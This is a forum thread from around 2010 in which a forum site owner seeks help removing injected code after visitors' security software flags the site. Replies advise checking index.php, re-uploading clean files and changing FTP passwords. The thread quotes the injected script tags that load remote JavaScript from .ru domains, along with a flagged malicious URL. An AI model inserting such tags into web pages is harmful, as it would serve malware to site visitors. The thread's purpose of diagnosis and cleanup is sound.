A few members have been complaining that when the accessed my site, their internet security has been flagging up warnings.
One of my members kindly found the following on my index:
<!-- end: index --><script type="text/javascript" src="http://stupiddomain.ru/Laptop.js"></script>
<!--6d9d2ecfc24af862611535a01848d3f3-->
Which possibly relates to:
http://blog.unmaskparasites.com/2010/06/...ns-part-2/
I looked into it using Firebug but I cannot find the data to remove:
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<style>
<style>
<head>
<body>
<div id="container">
<div id="unofficial">
<script type="text/javascript">
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"/>
<script type="text/javascript">
<script type="text/javascript">
<noscript/>
<script type="text/javascript" src="http://chickcase.ru/Laptop.js"/>
</body>
<style type="text/css">
</html>
Does anyone have any suggestions where to look / what to remove.
This is very important.
Many Thanks
Cheers
DoN
Seems to be in index.php, do a search in this file and see what you find. I'd also change your FTP password, and make sure files don't have higher CHMOD permissions than they need.
Hi Matt,
Been a while since you last helped me
Anyway, thank you for the help. I have located the code and removed it from the index.php from both my live and test site.
However I have also noticed something else. I am using google chrome, when you click on a link displays the progress on the left hand side of the page.
Clicking on any link then has the following sequence:
Connecting.....
waiting for
www.vampirecounts.net
connecting.....
waiting for pocketbloke.ru <--- As far as I know this is nothing do with my site
The pocketbloke concerns me - I also still got a warning from Kapersky when I logged onto the site:
17/08/2010 20:42:56 Google Chrome Denied:
http://jackgas.ru:8080/index.php?Iva2dqm...qm5insa=.0 (analysis using the database of suspicious URLs)
http://jackgas.ru:8080/index.php?Iva2dqm...qm5insa=.0 URL found in the database
Any further suggestions on what I need to do?
Cheers
DoN
EDIT:
Further updates:
It appears that smileys have stopped working and that accessing the site is causing some browsers to crash. This is now getting urgent if anyone can please assist.
Hmm, you've got this code in all your javascript files too. What I'd do is upload all your files again, to make sure nothing else has been effected.
Just all the javascript files? If I upload everything then I won't I loose custom coding etc?
At minimum the javascript files but I'd upload everything again to make sure the files are clean; if you've edited any files, don't overwrite those but I'd still check them manually for this code that's getting added in.
Sorry to keep bothering you, but I want to make sure I am fully secure. I have realised I have been uploading using FTP not, SFTP. Can you please recommend a client to use SFTP?
Hi, the same type of hacking actually occured with MyBBRunway yesterday. It was a different domain (but also russian), and linked to Emoticon.js on their domain. It was placed in all of the Javascript files, and the guys also messed up the WordPress installation.
I know this because it was in the same type of format on the template:
<!-- end: index --><script type="text/javascript" src="http://somerandomdomain.ru/Emoticon.js"></script>
<!--Somenumbersletters-->
Do you run WordPress?
2000th Post!!!! 
Hi,
No I don't have word press.
I have just deleted the javascript folder, and uploaded fresh and the problem still there. The smilies still don't work and it chrome still shows that unknown address when loading the page.
Is there anywhere else you recommend I look? As I said, replacing the full file structure will mean loss of my theme and coding etc.
Any suggestions?
Cheers
DoN
Nagsh, I reuploaded a clean version of MyBB and changed my FTP, Database, Root, SSH, etc passwords. I am not sure how they got into my WordPress and MyBB files. Must be FTP
.